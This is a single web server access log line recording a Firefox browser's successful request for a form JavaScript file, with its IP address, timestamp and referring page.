178.165.186.69 - - [23/Jan/2025:12:14:58 +0100] "GET /gui/javascript/form_form.js?1737630898 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=630838" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
